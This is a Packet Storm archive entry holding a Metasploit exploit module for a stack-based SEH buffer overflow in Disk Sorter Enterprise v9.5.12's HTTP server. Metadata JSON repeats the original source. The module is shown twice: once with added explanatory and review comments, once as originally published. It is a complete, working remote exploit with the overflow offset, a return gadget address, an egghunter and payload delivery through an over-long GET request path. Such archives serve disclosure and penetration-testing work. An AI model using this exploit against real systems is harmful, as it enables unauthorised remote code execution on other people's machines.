ID PACKETSTORM:142282
Type packetstorm
Reporter Daniel Teixeira
Modified 2017-04-24T00:00:00
Description
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
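# Disk Sorter Enterprise v9.5.12 — SEH-based stack overflow in the request
# path of an HTTP GET handled by the product's built-in web server.
#
# Exploitation strategy (see #exploit): an over-long request path overwrites
# the SEH record at 'Offset' bytes; the handler address is a POP/POP/RET
# gadget in libspp.dll, which lands execution on an egghunter that locates
# the tagged payload elsewhere in memory.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Disk Sorter Enterprise GET Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in the web interface of Disk Sorter Enterprise v9.5.12, caused by
        improper bounds checking of the request path in HTTP GET requests
        sent to the built-in web server. This module has been tested
        successfully on Windows 7 SP1 x86.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniel Teixeira'
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          # NUL, tab, LF, CR, space and '&' would terminate or alter the
          # request path, so the encoder must avoid them.
          'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
          'Space'    => 500
        },
      'Targets'        =>
        [
          [ 'Disk Sorter Enterprise v9.5.12',
            {
              # Distance from the start of the request path to the SEH record.
              'Offset' => 2488,
              # POP # POP # RET gadget in libspp.dll (fixed, non-ASLR base
              # assumed by the author; not verified here).
              'Ret'    => 0x10051223
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Mar 15 2017',
      'DefaultTarget'  => 0))
  end

  # Fingerprint the target by reading the product banner from the root page.
  #
  # Returns:
  #   Appears  - banner present and reports version 9.5.12
  #   Detected - banner present but a different version
  #   Safe     - root page served (200) but no Disk Sorter banner found
  #   Unknown  - no response, or a non-200 status that prevents fingerprinting
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )

    # No HTTP response at all: host down, filtered, or the request timed out.
    unless res
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    # A reply that is not 200 is not a timeout; report it as such instead of
    # the misleading "connection timeout" message the original used here.
    unless res.code == 200
      vprint_error("Unable to determine: unexpected HTTP status #{res.code}")
      return Exploit::CheckCode::Unknown
    end

    version = res.body[/Disk Sorter Enterprise v[^<]*/]
    # NOTE(review): a 200 without the banner is treated as Safe, matching the
    # original module. A front-end proxy could also produce this; consider
    # Unknown if false negatives matter for your engagement.
    return Exploit::CheckCode::Safe unless version

    vprint_status("Version detected: #{version}")
    return Exploit::CheckCode::Appears if version.include?('9.5.12')

    Exploit::CheckCode::Detected
  end

  # Build and send the malicious request path.
  #
  # Layout of the path (left to right):
  #   [Offset bytes of filler] [SEH record -> POP/POP/RET] [egghunter]
  #   [10 NOPs] [tagged egg + encoded payload] [5500 bytes of filler]
  # The trailing filler pushes the overflow far enough to trigger the
  # exception that makes the SEH chain fire.
  def exploit
    eggoptions = {
      checksum: true,
      # The tag must itself be free of bad characters since it travels in
      # the request path alongside the payload.
      eggtag:   rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    sploit = rand_text_alpha(target['Offset'])
    sploit << generate_seh_record(target.ret)
    sploit << hunter
    sploit << make_nops(10)
    sploit << egg
    sploit << rand_text_alpha(5500)

    print_status('Sending request...')

    # The path is sent as-is (no leading '/'), exactly as in the original
    # module; the vulnerable parser does not require one.
    send_request_cgi(
      'method' => 'GET',
      'uri'    => sploit
    )
  end
end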
`
{"id": "PACKETSTORM:142282", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Disk Sorter Enterprise 9.5.12 GET Buffer Overflow", "description": "", "published": "2017-04-24T00:00:00", "modified": "2017-04-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/142282/Disk-Sorter-Enterprise-9.5.12-GET-Buffer-Overflow.html", "reporter": "Daniel Teixeira", "references": [], "cvelist": [], "lastseen": "2017-04-25T01:25:36", "viewCount": 1, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-04-25T01:25:36", "rev": 2}, "dependencies": {"references": [], "modified": "2017-04-25T01:25:36", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/142282/disksorter_bof.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Seh \ninclude Msf::Exploit::Remote::Egghunter \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Disk Sorter Enterprise GET Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow vulnerability \nin the web interface of Disk Sorter Enterprise v9.5.12, caused by \nimproper bounds checking of the request path in HTTP GET requests \nsent to the built-in web server. This module has been tested \nsuccessfully on Windows 7 SP1 x86. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniel Teixeira' \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Platform' => 'win', \n'Payload' => \n{ \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\", \n'Space' => 500 \n}, \n'Targets' => \n[ \n[ 'Disk Sorter Enterprise v9.5.12', \n{ \n'Offset' => 2488, \n'Ret' => 0x10051223 # POP # POP # RET [libspp.dll] \n} \n] \n], \n'Privileged' => true, \n'DisclosureDate' => 'Mar 15 2017', \n'DefaultTarget' => 0)) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/' \n) \n \nif res && res.code == 200 \nversion = res.body[/Disk Sorter Enterprise v[^<]*/] \nif version \nvprint_status(\"Version detected: #{version}\") \nif version =~ /9\\.5\\.12/ \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Detected \nend \nelse \nvprint_error('Unable to determine due to a HTTP connection timeout') \nreturn Exploit::CheckCode::Unknown \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \n \neggoptions = { \nchecksum: true, \neggtag: rand_text_alpha(4, payload_badchars) \n} \n \nhunter, egg = generate_egghunter( \npayload.encoded, \npayload_badchars, \neggoptions \n) \n \nsploit = rand_text_alpha(target['Offset']) \nsploit << generate_seh_record(target.ret) \nsploit << hunter \nsploit << make_nops(10) \nsploit << egg \nsploit << rand_text_alpha(5500) \n \nprint_status('Sending request...') \n \nsend_request_cgi( \n'method' => 'GET', \n'uri' => sploit \n) \nend \nend \n`\n"}
{}